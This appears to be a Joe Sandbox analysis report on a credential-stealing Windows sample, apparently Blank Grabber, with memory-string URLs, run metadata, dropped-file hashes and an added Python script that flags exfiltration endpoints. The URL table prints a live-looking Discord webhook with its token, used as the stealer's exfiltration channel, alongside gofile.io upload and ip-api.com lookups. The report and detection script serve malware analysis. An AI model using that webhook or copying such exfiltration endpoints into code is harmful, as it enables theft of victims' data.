                                                                                                                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specKpHYfxnJs6.exe, 00000004.00000002.2884004752.0000000004D80000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://github.com/urllib3/urllib3/issues/2920KpHYfxnJs6.exe, 00000004.00000002.2894453281.0000000007E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17KpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007B0C000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2742827988.0000000007D4A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_dataKpHYfxnJs6.exe, 00000004.00000003.2459281802.0000000004E02000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884068871.0000000004DD5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459218344.0000000004DE8000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2459199277.0000000004E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://yahoo.com/KpHYfxnJs6.exe, 00000004.00000003.2603116149.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2884329550.0000000004E45000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881336814.0000000004E43000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744996096.0000000004E44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://account.bellmedia.cKpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.0000000007531000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621699329.000000000754E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881124605.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744888765.0000000007538000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2744505869.0000000007534000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2617001102.000000000754D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880323805.000000000752A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000753D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000754F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 
00000004.00000003.2616436229.000000000753A000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.000000000754D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://login.microsoftonline.comKpHYfxnJs6.exe, 00000004.00000003.2679930473.000000000AB50000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684913468.0000000009830000.00000004.00001000.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crl.thawte.com/ThawteTimestampingCA.crl0KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
https://html.spec.whatwg.org/multipage/ | KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2881487113.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2616436229.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2623954278.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2604998063.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674876245.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485485628.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484622291.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880603625.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886303879.00000000075B1000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2636804800.000000000759F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.000000000759F000.00000004.00000020.00020000.00000000.sdmp | false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings | KpHYfxnJs6.exe, 00000004.00000002.2891011051.00000000078F0000.00000004.00001000.00020000.00000000.sdmp | false
https://www.zhihu.com/ | KpHYfxnJs6.exe, 00000004.00000002.2895031022.0000000009770000.00000004.00001000.00020000.00000000.sdmp | false
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | KpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007AE8000.00000004.00000020.00020000.00000000.sdmp | false
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmp | false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1 | KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484185809.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false
https://contoso.com/ | powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmp | false
http://www.iana.org/time-zones/repository/tz-link.html | KpHYfxnJs6.exe, 00000004.00000003.2480053850.000000000750B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479932107.0000000007506000.00000004.00000020.00020000.00000000.sdmp | false
https://api.gofile.io/getServer | KpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmp | false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | KpHYfxnJs6.exe, 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmp | false
http://nuget.org/NuGet.exe | powershell.exe, 0000000E.00000002.2545646683.0000000006036000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmp | false
https://discord.com/api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPD | KpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmp | false
https://sectigo.com/CPS0 | KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmp | false
http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/ | KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmp | false
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | KpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmp | false
http://ocsp.thawte.com0 | KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmp | false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | KpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmp | false
https://www.wykop.pl/ | KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmp | false
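The rows above are Joe Sandbox's "URL string found in memory" table flattened to text: each line is the URL, immediately followed by the comma-separated list of processes and memory dumps it was found in, then the Malicious flag, with one long row wrapped onto a second line. Most entries are library strings (urllib3, the RFC 8259 link, the memoize recipe) and only a handful matter for triage: the Discord webhook (the grabber's exfiltration channel; the token part of that URL is a live credential, so redact it when it goes into a ticket), the gofile.io upload API, and ip-api.com from the contacted-IP table. The script below is an added example, not Joe Sandbox's code and not Blank Grabber's: it re-joins wrapped rows, splits URL from sources, flags those endpoints and prints the webhook id with the token redacted. It assumes the only process names that open a source list are the two seen in this section, treats the leading 8-digit field of a dump id as the report's process index (an assumption), and runs on constructed rows shaped like the ones above, with a placeholder in place of the real webhook token.

```python
import re
from dataclasses import dataclass, field

# Process names that open a source list in this report's URL table. Everything
# before the first occurrence is taken to be the URL string. Assumption: these
# two are the only process names that appear in this section of the report.
PROCESS_NAMES = ("KpHYfxnJs6.exe", "powershell.exe")
_PROC_ALT = "|".join(re.escape(p) for p in PROCESS_NAMES)

ROW_RE = re.compile(
    r"^(?P<url>.*?)"                                    # shortest prefix that lets the rest match
    r"(?P<sources>(?:" + _PROC_ALT + r")(?:,\s.*?)?)"   # source list starts at the first process name
    r"(?P<malicious>true|false)$"                       # the report's Malicious column
)

# Memory-dump id as printed in the report. The leading 8-hex-digit field is
# assumed to be the report's per-process index (e.g. 00000004, 00000046).
DUMP_RE = re.compile(r"^(?P<proc>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}\.")

# Exfiltration and recon endpoints worth flagging in a stealer's string set.
INDICATORS = {
    "discord_webhook": re.compile(
        r"https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)"),
    "gofile_upload_api": re.compile(r"https?://api\.gofile\.io/"),
    "ip_api_geolocation": re.compile(r"https?://ip-api\.com/"),
}


@dataclass
class Row:
    url: str
    sources: list
    malicious: bool
    hits: list = field(default_factory=list)


def join_wrapped(lines):
    """Re-join rows that text extraction wrapped onto a second line.
    A complete row always ends with the Malicious flag."""
    rows, buf = [], ""
    for raw in lines:
        part = raw.strip()
        if not part:
            continue
        buf = f"{buf} {part}" if buf else part
        if buf.endswith(("true", "false")):
            rows.append(buf)
            buf = ""
    if buf:
        rows.append(buf)          # dangling fragment; parse_row() rejects it
    return rows


def parse_row(row):
    m = ROW_RE.match(row.strip())
    if not m:
        return None
    sources = [s for s in re.split(r",\s*", m["sources"]) if s]
    return Row(url=m["url"], sources=sources, malicious=m["malicious"] == "true")


def classify(row):
    row.hits = [name for name, pat in INDICATORS.items() if pat.search(row.url)]
    return row


def dump_process_ids(row):
    """Process indices whose memory dumps contained the string (see DUMP_RE)."""
    return sorted({m["proc"] for s in row.sources if (m := DUMP_RE.match(s))})


def triage(lines):
    rows = (parse_row(r) for r in join_wrapped(lines))
    return [classify(r) for r in rows if r]


def exfil_summary(rows):
    """{indicator: [label, ...]}; the Discord token is replaced by the webhook id
    so the summary can go into a ticket without copying a live credential."""
    out = {}
    for r in rows:
        for h in r.hits:
            label = r.url
            if h == "discord_webhook":
                wid = INDICATORS[h].search(r.url).group(1)
                label = f"discord webhook id {wid} (token redacted)"
            out.setdefault(h, []).append(label)
    return out


# Constructed sample rows shaped like this report's table; the webhook token is
# a placeholder, not the value from the report.
SAMPLE_ROWS = """
https://html.spec.whatwg.org/multipage/KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2646596317.000000000759F000.00000004.00000020.00020000.00000000.sdmpfalse
https://contoso.com/powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
https://www.rfc-editor.org/rfc/rfc8259#section-8.1KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe,
00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
https://api.gofile.io/getServerKpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpfalse
https://discord.com/api/webhooks/1325289657537396889/PLACEHOLDER_TOKEN_not_from_the_reportKpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmpfalse
"""

if __name__ == "__main__":
    rows = triage(SAMPLE_ROWS.splitlines())
    for row in rows:
        print(row.hits or "-", row.url, dump_process_ids(row))
    print(exfil_summary(rows))
```

The URL/source split relies on the process name being the first thing after the URL string, which is why "https://contoso.com/" followed by "powershell.exe" parses correctly while the trailing junk bytes in strings such as "https://sectigo.com/CPS0" stay attached to the URL, as they are in the report.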
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1584305
Start date and time:2025-01-05 07:17:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 13m 8s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:131
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:KpHYfxnJs6.exe
renamed because original name is a hash value
Original Sample Name:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
Detection:MAL
Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@206/55@4/2
EGA Information:
• Successful, ratio: 33.3%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 182
• Number of non-executed functions: 92
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.85.23.206, 40.69.42.241, 142.250.185.195, 13.107.246.45
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, gstatic.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target KpHYfxnJs6.exe, PID 7320 because there are no executed functions
• Execution Graph export aborted for target KpHYfxnJs6.exe, PID 7732 because there are no executed functions
• Execution Graph export aborted for target mshta.exe, PID 8168 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
01:19:21 | API Interceptor | 133x Sleep call for process: powershell.exe modified
01:19:22 | API Interceptor | 8x Sleep call for process: WMIC.exe modified
No context
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                              Entropy (8bit):5.378563660172776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:3RfWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R8qrs:5WSU4xymI4RfoUeW+mZ9tlNWR8qA
                                                                                                                                                                                                                              MD5:C558085590884BA7195913DD0E44582F
                                                                                                                                                                                                                              SHA1:5132D7FACAE7A09E0AEFBE7EABF69106CA55E609
                                                                                                                                                                                                                              SHA-256:21A4036000FEA9E1B5F3548E0900ED3268D007CA80FF982724C48569D73D56AE
                                                                                                                                                                                                                              SHA-512:536A6DC6798D2812027D69DAC5BB998256FC159F4C22E5CAF928339424ADBE97C421FD8E964FDEAEF9903024B1363821138D0C7E17FC54081FA0A4D3C8298B77
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):704560
Entropy (8bit):7.9282919345296925
Encrypted:false
SSDEEP:12288:NCJt7Gi9YHYWTnROPopFVOo0SrQLTZ6BfY0f9wb4UyJ2OtOgQf/3hkdN:NCT9qTnU6FtrQLVyfY0f9WtfhXfP+dN
MD5:F29A15EEE3DB90905B9A36E712392BE3
SHA1:9A5351EB40071CB4F48AF24C5AF283C69E81166E
SHA-256:270C511F7BB40AAF3BAE5488BDA9910B05BB059640D7C06D77215E749B951258
SHA-512:707C3BE5E1EFBA3350AB416D24C2CC051C7CB33C5DD6C58D7DAEBF0857BEBBDC830E8FE7B5A02A09611E6B38CB30ACB9C30C4F516E4C148BC16EFA9609449AFF
Malicious:false
Reputation:unknown

Process:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
File Type:RAR archive data, v5
Category:dropped
Size (bytes):755918
Entropy (8bit):7.999753224954264
Encrypted:true
SSDEEP:12288:wKYOGvcMY9XCDe6JUvt1ekT0+y2PUJvLoB8mAwGjK1cpTXoKWO6EDXmz9nLN8CGI:HYVWhSJUvik9sJDI8mGjK1cpboKWO6E2
MD5:D2E40973483140EFCD32F357D22FAD0A
SHA1:397AE63687109602E54ECF817EF2D495D3F9056D
SHA-256:F792D64BBB2E4E8252168BFEAB977A61DF58D90B3E1AA6A950E1A0ED52016CF6
SHA-512:6931B9B5B86B78E5BC40B71794671B50CAFC81E636A5674F89838FF2BE94BAD7B6B5596C52C783D56D6FC9654E197C7B250C5357A84BA2A0F1D8FCA9CA8BBF45
Malicious:true
Reputation:unknown

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Jan 5 07:27:12 2025, 1st section name ".debug$S"
Category:dropped
Size (bytes):1372
Entropy (8bit):4.101160200971171
Encrypted:false
SSDEEP:24:HDFq9s+fbkDfHhwKMfWvrxfwI+ycuZhN7iakSajPNnqS+d:jgbiqKYWvFo1ulOa3aqSe
MD5:86127ED35F6AFAAAD71C18D6D3460552
SHA1:CE11B7CA8CACF111D38CC476BC425FCA3DC2F747
SHA-256:F465BC5BA99C8BFA36B7AE08BB817836485D2563AE740C9DD895864819DF7DE7
SHA-512:E08472DF005F5C906C1D4084D725C74372AB814555BE4ACF85E3FC6601B55C238530466814884BD954173566A1023245D3FD163D6255E7D5F324621B38E0042B
Malicious:false
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):80800
Entropy (8bit):6.781496286846518
Encrypted:false
SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
MD5:1E6E97D60D411A2DEE8964D3D05ADB15
SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):44416
Entropy (8bit):7.783586529830432
Encrypted:false
SSDEEP:768:xVhO4M5bIfA9H2Bs9YnYMfUwRVgXm6kTmnbcuyD7U1IDtVD8GYiSyvcPxWE+9:m5MfA9gs9IY0UwZ6kinouy81IDtVDn7l
MD5:93C79A5FAAA4D320432B06AE2879F1F4
SHA1:772B881874A3947F2205644DF6EBA5972366AAB6
SHA-256:02EDA0188E989264FFB5BFE4474EF1BFA36F8A0BAEE6764E11B4AA604CC30D47
SHA-512:4757E41FA5260601246EE851D43FCFFA17EB591DD4E5F987E18B77D9C3269431A610F9B32EBC507C64394C29AFE3F7C030D5448417490431742C6C462F156B06
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):52600
Entropy (8bit):7.777741053822562
Encrypted:false
SSDEEP:1536:Nwk9VLAEGrp/zkMJBMwCurvnouy8RIDQPzx7SyGvPx8:Ck9VSgMJBMBuroutRIDQPzxk3x8
MD5:35001F868CBC1C3DCD337B1915356B09
SHA1:4B1C0E51ED920D29894739DB618952632D6275AA
SHA-256:7753972DB061B3FD543EC69ED478E05FE6D98E56960C3BDFAA101164A2508FBD
SHA-512:FA9628A69FC532B3805CCA46D4CDBDB40AC4A8187D87FD469B522797368D588D16A2CB286C43544137849858444F71410DEED90DDE0CAC5A34C9C55D69DDF1AC
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown

Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):79736
Entropy (8bit):7.899012395054576
Encrypted:false
SSDEEP:1536:yw/aniAME5OmGy0wakNmsmhGJAylteE9P+AOFGkpwy+Cxt8U2VjInouy8tID5q4d:yw1U5Om50wakNCEJNea+AO/xX0U2lgov
MD5:B6F3B12773DCEB50350A472A52C67B74
SHA1:2B260CCC29D576BB3C7B6E845F1AEC2DF0028F81
SHA-256:65DDF0408964EAF41946ABF0A28E75023E8A872595056B0D9CDB15C5ADDC71BF
SHA-512:BDDB3927BB91A82C8D755B5F17E17D5AD8B56D6F24471FECC8FF37E09C12C6750F583A0199114539185FEC17E46F49FE7C381C449BD799DACEFDD4CBBBFC7750
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation:unknown
